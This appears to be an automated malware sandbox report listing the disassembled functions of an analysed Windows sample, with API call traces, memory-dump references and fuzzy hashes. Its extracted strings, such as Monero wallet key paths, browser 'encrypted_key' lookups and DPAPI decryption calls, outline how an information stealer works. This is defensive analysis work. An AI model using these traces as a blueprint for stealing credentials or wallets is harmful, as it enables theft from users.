                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00A60E28,00000000,?), ref: 00A5882F
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00A58836
                                        • wsprintfA.USER32 ref: 00A58850
                                          • Part of subcall function 00A5A740: lstrcpy.KERNEL32(00A60E17,00000000), ref: 00A5A788
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateProcesslstrcpywsprintf
                                        • String ID: %dx%d
                                        • API String ID: 1695172769-2206825331
                                        • Opcode ID: d0a065f766faf8da72814911dde543cd0bd5bd578a16397e384482237f790708
                                        • Instruction ID: 2f0dbfe5f5913254e272aa5ad44b25f7a5c9200d9e1ac2c3389460de13d67d27
                                        • Opcode Fuzzy Hash: d0a065f766faf8da72814911dde543cd0bd5bd578a16397e384482237f790708
                                        • Instruction Fuzzy Hash: 8E2100B1A40204BFEB04DFD4DD45FAEBBB8FB48711F104519FA05A72C0C77999018BA5
                                        Function 00A58D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00A5951E,00000000), ref: 00A58D5B
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00A58D62
                                        • wsprintfW.USER32 ref: 00A58D78
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateProcesswsprintf
                                        • String ID: %hs
                                        • API String ID: 769748085-2783943728
                                        • Opcode ID: 8ab8ef96c2d705768631713ee7f55419d8b0c07fcc1cbdd6aaf23c12e1c5ab7a
                                        • Instruction ID: 6e1d0db612b6c73483daa20f53e67f9c7ccf5494abf670e9f8e2d11a0b4a96d4
                                        • Opcode Fuzzy Hash: 8ab8ef96c2d705768631713ee7f55419d8b0c07fcc1cbdd6aaf23c12e1c5ab7a
                                        • Instruction Fuzzy Hash: AAE0ECB5A40208BBE710DB94DD0AF6D77B8EB44702F004595FE0997280DA719E109BAA
                                        Function 00A4A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00A5A740: lstrcpy.KERNEL32(00A60E17,00000000), ref: 00A5A788
                                          • Part of subcall function 00A5A9B0: lstrlen.KERNEL32(?,016091B8,?,\Monero\wallet.keys,00A60E17), ref: 00A5A9C5
                                          • Part of subcall function 00A5A9B0: lstrcpy.KERNEL32(00000000), ref: 00A5AA04
                                          • Part of subcall function 00A5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A5AA12
                                          • Part of subcall function 00A5A8A0: lstrcpy.KERNEL32(?,00A60E17), ref: 00A5A905
                                          • Part of subcall function 00A58B60: GetSystemTime.KERNEL32(00A60E1A,0160A9C8,00A605AE,?,?,00A413F9,?,0000001A,00A60E1A,00000000,?,016091B8,?,\Monero\wallet.keys,00A60E17), ref: 00A58B86
                                          • Part of subcall function 00A5A920: lstrcpy.KERNEL32(00000000,?), ref: 00A5A972
                                          • Part of subcall function 00A5A920: lstrcat.KERNEL32(00000000), ref: 00A5A982
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00A4A2E1
                                        • lstrlen.KERNEL32(00000000,00000000), ref: 00A4A3FF
                                        • lstrlen.KERNEL32(00000000), ref: 00A4A6BC
                                          • Part of subcall function 00A5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A5A7E6
                                        • DeleteFileA.KERNEL32(00000000), ref: 00A4A743
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                        • String ID:
                                        • API String ID: 211194620-0
                                        • Opcode ID: 54fc089d7e968ffe62da8bdcb9235501fb0a53bda0fafe5255dbbc9d40215be7
                                        • Instruction ID: 12ffd4d0e084c469a153febb6bd5a292b61dd5f7aeb101fe6612072527f38002
                                        • Opcode Fuzzy Hash: 54fc089d7e968ffe62da8bdcb9235501fb0a53bda0fafe5255dbbc9d40215be7
                                        • Instruction Fuzzy Hash: F8E10272A101189ADB04FBA4DE92EEE733CBF64301F508659F91772091EF346A4DCB66
                                        Function 00A4D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00A5A740: lstrcpy.KERNEL32(00A60E17,00000000), ref: 00A5A788
                                          • Part of subcall function 00A5A9B0: lstrlen.KERNEL32(?,016091B8,?,\Monero\wallet.keys,00A60E17), ref: 00A5A9C5
                                          • Part of subcall function 00A5A9B0: lstrcpy.KERNEL32(00000000), ref: 00A5AA04
                                          • Part of subcall function 00A5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A5AA12
                                          • Part of subcall function 00A5A8A0: lstrcpy.KERNEL32(?,00A60E17), ref: 00A5A905
                                          • Part of subcall function 00A58B60: GetSystemTime.KERNEL32(00A60E1A,0160A9C8,00A605AE,?,?,00A413F9,?,0000001A,00A60E1A,00000000,?,016091B8,?,\Monero\wallet.keys,00A60E17), ref: 00A58B86
                                          • Part of subcall function 00A5A920: lstrcpy.KERNEL32(00000000,?), ref: 00A5A972
                                          • Part of subcall function 00A5A920: lstrcat.KERNEL32(00000000), ref: 00A5A982
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00A4D481
                                        • lstrlen.KERNEL32(00000000), ref: 00A4D698
                                        • lstrlen.KERNEL32(00000000), ref: 00A4D6AC
                                        • DeleteFileA.KERNEL32(00000000), ref: 00A4D72B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                        • String ID:
                                        • API String ID: 211194620-0
                                        • Opcode ID: 77365c2c1f6a93be811f7647403b60b7887335bee5d3bd46ac259149a19e9a65
                                        • Instruction ID: f089b61d726a62104386f8be4a9dacf9184718e8af9b82d5af1eec672cda93c6
                                        • Opcode Fuzzy Hash: 77365c2c1f6a93be811f7647403b60b7887335bee5d3bd46ac259149a19e9a65
                                        • Instruction Fuzzy Hash: DC911472A101189BDB04FBA0DE56EEE7338BF64301F504669F907B6091EF346A4DCB66
                                        Function 00A4D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00A5A740: lstrcpy.KERNEL32(00A60E17,00000000), ref: 00A5A788
                                          • Part of subcall function 00A5A9B0: lstrlen.KERNEL32(?,016091B8,?,\Monero\wallet.keys,00A60E17), ref: 00A5A9C5
                                          • Part of subcall function 00A5A9B0: lstrcpy.KERNEL32(00000000), ref: 00A5AA04
                                          • Part of subcall function 00A5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A5AA12
                                          • Part of subcall function 00A5A8A0: lstrcpy.KERNEL32(?,00A60E17), ref: 00A5A905
                                          • Part of subcall function 00A58B60: GetSystemTime.KERNEL32(00A60E1A,0160A9C8,00A605AE,?,?,00A413F9,?,0000001A,00A60E1A,00000000,?,016091B8,?,\Monero\wallet.keys,00A60E17), ref: 00A58B86
                                          • Part of subcall function 00A5A920: lstrcpy.KERNEL32(00000000,?), ref: 00A5A972
                                          • Part of subcall function 00A5A920: lstrcat.KERNEL32(00000000), ref: 00A5A982
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00A4D801
                                        • lstrlen.KERNEL32(00000000), ref: 00A4D99F
                                        • lstrlen.KERNEL32(00000000), ref: 00A4D9B3
                                        • DeleteFileA.KERNEL32(00000000), ref: 00A4DA32
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                        • String ID:
                                        • API String ID: 211194620-0
                                        • Opcode ID: 2932963edf25924533e3f2a92edf5ecec170e9dec29538390f24b6d01bd2dea7
                                        • Instruction ID: 809b05af089b9039faa8f6cc462d4b6436865fb35c67580ac62e6cce049ebdce
                                        • Opcode Fuzzy Hash: 2932963edf25924533e3f2a92edf5ecec170e9dec29538390f24b6d01bd2dea7
                                        • Instruction Fuzzy Hash: 1681D472A101189BDB04FBA4DE56EEE7338BF64301F504629F907A6091FF346A4DCB66
                                        Function 00A53560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen
                                        • String ID:
                                        • API String ID: 367037083-0
                                        • Opcode ID: 97d33dab8779176e0f378c3df9e3c9034501eafa8943c7f69cd9d6b89bff2f05
                                        • Instruction ID: 8cace3af4a1a587fbb724a20ebc2831057fcabf80d21d641f29534bc7d1d282f
                                        • Opcode Fuzzy Hash: 97d33dab8779176e0f378c3df9e3c9034501eafa8943c7f69cd9d6b89bff2f05
                                        • Instruction Fuzzy Hash: 2C414D72E10108AFCF04EFA4D945AEFB774BF54305F008518E912A6291EB74AA49CFA2
                                        Function 00A49CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00A5A740: lstrcpy.KERNEL32(00A60E17,00000000), ref: 00A5A788
                                          • Part of subcall function 00A499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A499EC
                                          • Part of subcall function 00A499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00A49A11
                                          • Part of subcall function 00A499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00A49A31
                                          • Part of subcall function 00A499C0: ReadFile.KERNEL32(000000FF,?,00000000,00A4148F,00000000), ref: 00A49A5A
                                          • Part of subcall function 00A499C0: LocalFree.KERNEL32(00A4148F), ref: 00A49A90
                                          • Part of subcall function 00A499C0: CloseHandle.KERNEL32(000000FF), ref: 00A49A9A
                                          • Part of subcall function 00A58E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00A58E52
                                        • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00A49D39
                                          • Part of subcall function 00A49AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00A44EEE,00000000,00000000), ref: 00A49AEF
                                          • Part of subcall function 00A49AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00A44EEE,00000000,?), ref: 00A49B01
                                          • Part of subcall function 00A49AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00A44EEE,00000000,00000000), ref: 00A49B2A
                                          • Part of subcall function 00A49AC0: LocalFree.KERNEL32(?,?,?,?,00A44EEE,00000000,?), ref: 00A49B3F
                                          • Part of subcall function 00A49B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00A49B84
                                          • Part of subcall function 00A49B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00A49BA3
                                          • Part of subcall function 00A49B60: LocalFree.KERNEL32(?), ref: 00A49BD3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                        • String ID: $"encrypted_key":"$DPAPI
                                        • API String ID: 2100535398-738592651
                                        • Opcode ID: 0988fc431ecdb902e3425951a666ea2033c34fa9af9b7280c891aa339e398686
                                        • Instruction ID: 9214632bb833c2c6ffafed0464c2901d8570c2d6084f938f6728788b8dead108
                                        • Opcode Fuzzy Hash: 0988fc431ecdb902e3425951a666ea2033c34fa9af9b7280c891aa339e398686
                                        • Instruction Fuzzy Hash: DD3145B9D10109ABCF14DFE4DD85EEFB7B8BF88304F144519E905A7241EB349A15CBA1
                                        Function 00A592E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileA.KERNEL32(00A53AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00A53AEE,?), ref: 00A592FC
                                        • GetFileSizeEx.KERNEL32(000000FF,00A53AEE), ref: 00A59319
                                        • CloseHandle.KERNEL32(000000FF), ref: 00A59327
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$CloseCreateHandleSize
                                        • String ID:
                                        • API String ID: 1378416451-0
                                        • Opcode ID: e6336d392901440cdd0f2be8ec88e755a9e3f9c4f5fdf98236a487f75c59579c
                                        • Instruction ID: 5487eff025364a9a3f4694b8edb79c04ff3d5bb0d818cd52b6715c2e7206c625
                                        • Opcode Fuzzy Hash: e6336d392901440cdd0f2be8ec88e755a9e3f9c4f5fdf98236a487f75c59579c
                                        • Instruction Fuzzy Hash: 0EF04F35E40208FBEB10DFB4DC49F9E77B9FB48721F10C258BA51AB2C0DA7496059B44
                                        Function 00A5C742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • __getptd.LIBCMT ref: 00A5C74E
                                          • Part of subcall function 00A5BF9F: __amsg_exit.LIBCMT ref: 00A5BFAF
                                        • __getptd.LIBCMT ref: 00A5C765
                                        • __amsg_exit.LIBCMT ref: 00A5C773
                                        • __updatetlocinfoEx_nolock.LIBCMT ref: 00A5C797
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                        • String ID:
                                        • API String ID: 300741435-0
                                        • Opcode ID: d589267e729ba8edf6be06eaa99fc8e486694439abc19c93d1b06e696c5f71ad
                                        • Instruction ID: 5b4dd0efd8122e88bb0fd4a2d8a58508f9140e813f9433c303496e1244cea62e
                                        • Opcode Fuzzy Hash: d589267e729ba8edf6be06eaa99fc8e486694439abc19c93d1b06e696c5f71ad
